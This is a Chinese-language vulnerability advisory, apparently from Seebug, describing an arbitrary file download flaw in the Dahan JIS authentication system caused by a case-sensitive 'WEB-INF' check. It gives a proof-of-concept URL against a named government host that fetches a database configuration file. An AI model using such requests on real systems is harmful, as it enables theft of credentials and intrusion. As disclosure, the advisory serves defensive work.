大汉版通身份认证JIS系统任意文件下载漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 大汉版通用登录JIS系统任意文件下载漏洞 ### 详细说明: 界面: [<img src="https://images.seebug.org/upload/201401/26105926dbb7ae7dbef246c271df993903d50aa8.png" alt="image001.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26105926dbb7ae7dbef246c271df993903d50aa8.png) jis任意文件下载。至少WIN下一般都可以通杀,个别版本加了权限验证需要登录,但是我觉得只要登录后的身份合适,在win下都通杀的。 ### 漏洞证明: ``` if(strFilePath.indexOf("WEB-INF")!=-1){ LogWriter.debug("下载文件不存在!"); out.println("<script>alert('file not exist!');history.back();</script>"); return; } //判断文件是否存在 File file = new File(strFilePath); if (!file.exists() || file.getName().endsWith(".jsp")) { LogWriter.debug("下载文件不存在!"); out.println("<script>alert('file not exist!');history.back();</script>"); return; } ``` 对大小写敏感的判断在win下根本没用啊 http://management.ysx.gov.cn/jis/down.jsp?pathfile=web-inf/config/dbconfig.xml [<img src="https://images.seebug.org/upload/201401/261059478a10d39a643737c7072b9ee581c0ae38.png" alt="image003.png" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息